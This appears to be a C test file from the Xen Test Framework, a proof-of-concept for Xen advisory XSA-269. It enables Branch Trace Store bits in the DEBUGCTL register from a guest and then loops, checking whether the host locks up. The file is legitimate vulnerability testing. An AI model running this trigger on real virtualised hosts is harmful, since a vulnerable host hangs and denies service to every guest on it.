main.c

Go to the documentation of this file.

 
#include <xtf.h>
 
const char test_title[] = "XSA-269 PoC";
 
void test_main(void)
{
    unsigned int i;
    uint64_t val = 0;
 
    /*
     * If Debug Store is advertised, presume that vPMU is properly configured
     * for this domain, and that we're trusted not to (mis)use it.
     */
    if ( cpu_has_ds )
        return xtf_skip("Skip: Debug Store is available\n");
 
    /*
     * We cannot rely on CPUID bits, as vPMU is disabled by default.  Turn on
     * each part of BTS individually to reduce the chance of the host hang
     * being mitigated by a vmentry failure.  If vulnerable, we'd expect a
     * host lockup on the vmentry following the setting of BTS.
     */
    wrmsr_safe(MSR_DEBUGCTL, val |= DEBUGCTL_TR);
    wrmsr_safe(MSR_DEBUGCTL, val |= DEBUGCTL_BTS);
    wrmsr_safe(MSR_DEBUGCTL, val |  DEBUGCTL_BTINT);
 
    /*
     * If we're still alive, generate a billion jumps to check that BTS really
     * is disabled.
     */
    for ( i = 0; i < GB(1); ++i )
        barrier();
 
    /* If we're still alive at this point, Xen is definitely not vulnerable. */
 
    xtf_success("Success: Not vulnerable to XSA-269\n");
}
 
/*
 * Local variables:
 * mode: C
 * c-file-style: "BSD"
 * c-basic-offset: 4
 * tab-width: 4
 * indent-tabs-mode: nil
 * End:
 */